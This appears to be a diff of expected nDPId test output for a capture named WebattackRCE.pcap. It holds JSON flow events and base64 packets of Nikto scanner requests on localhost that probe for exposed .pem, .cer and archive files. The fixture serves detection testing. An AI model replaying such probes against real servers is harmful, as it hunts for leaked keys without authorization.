-01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276874,"flow_last_seen":1576420276874,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49810,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276874,"flow_last_seen":1576420276874,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49810,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":134,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276876,"flow_last_seen":1576420276876,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276876,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49812,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":1576420276876,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276876,"pkt":"AAAAAAAAAAAAAAAACABFAADCnWxAAEAGnsd\/AAABfwAAAcKUH5Co\/aUqs\/1iGoAYAED+tgAAAQEICp1m+7SdZvu0R0VUIC8xMjcwMDEucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":134,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276876,"flow_last_seen":1576420276876,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276876,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49812,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":134,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276876,"flow_last_seen":1576420276876,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276876,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49812,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276877,"flow_last_seen":1576420276877,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49814,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1576420276877,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276877,"pkt":"AAAAAAAAAAAAAAAACABFAADAt7lAAEAGhHx\/AAABfwAAAcKWH5CQPI\/1lm3rwoAYAED+tAAAAQEICp1m+7WdZvu1R0VUIC9zaXRlLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":135,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276877,"flow_last_seen":1576420276877,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49814,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":135,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276877,"flow_last_seen":1576420276877,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49814,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276879,"flow_last_seen":1576420276879,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276879,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49816,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1576420276879,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276879,"pkt":"AAAAAAAAAAAAAAAACABFAADAhf9AAEAGtjZ\/AAABfwAAAcKYH5Cnmb2\/tsRlFIAYAED+tAAAAQEICp1m+7edZvu2R0VUIC9zaXRlLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276879,"flow_last_seen":1576420276879,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276879,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49816,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276879,"flow_last_seen":1576420276879,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276879,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49816,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276881,"flow_last_seen":1576420276881,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276881,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49818,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":1576420276881,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276881,"pkt":"AAAAAAAAAAAAAAAACABFAADADYtAAEAGLqt\/AAABfwAAAcKaH5CHzTXOE9kNb4AYAED+tAAAAQEICp1m+7mdZvu5R0VUIC8xMjcwLnRhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276881,"flow_last_seen":1576420276881,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276881,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49818,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276881,"flow_last_seen":1576420276881,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276881,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49818,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":138,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276884,"flow_last_seen":1576420276884,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276884,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49820,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":1576420276884,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276884,"pkt":"AAAAAAAAAAAAAAAACABFAADAT5pAAEAG7Jt\/AAABfwAAAcKcH5DBOXfeD5T\/lYAYAED+tAAAAQEICp1m+7udZvu7R0VUIC8xMjcwLnRhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":138,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276884,"flow_last_seen":1576420276884,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276884,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49820,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":138,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276884,"flow_last_seen":1576420276884,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276884,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49820,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":139,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276885,"flow_last_seen":1576420276885,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49822,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1576420276885,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276885,"pkt":"AAAAAAAAAAAAAAAACABFAADFQQ5AAEAG+yJ\/AAABfwAAAcKeH5AdhXlKg0oevYAYAED+uQAAAQEICp1m+72dZvu9R0VUIC8xMjcuMC4wLjEuYWx6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276885,"flow_last_seen":1576420276885,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49822,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276885,"flow_last_seen":1576420276885,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49822,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":140,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276886,"flow_last_seen":1576420276886,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276886,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49824,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":1576420276886,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276886,"pkt":"AAAAAAAAAAAAAAAACABFAADFWJBAAEAG46B\/AAABfwAAAcKgH5CSJ2DMWYYFgIAYAED+uQAAAQEICp1m+76dZvu+R0VUIC8xMjcuMC4wLjEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276886,"flow_last_seen":1576420276886,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276886,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49824,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276886,"flow_last_seen":1576420276886,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276886,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49824,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":141,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276888,"flow_last_seen":1576420276888,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276888,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49826,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 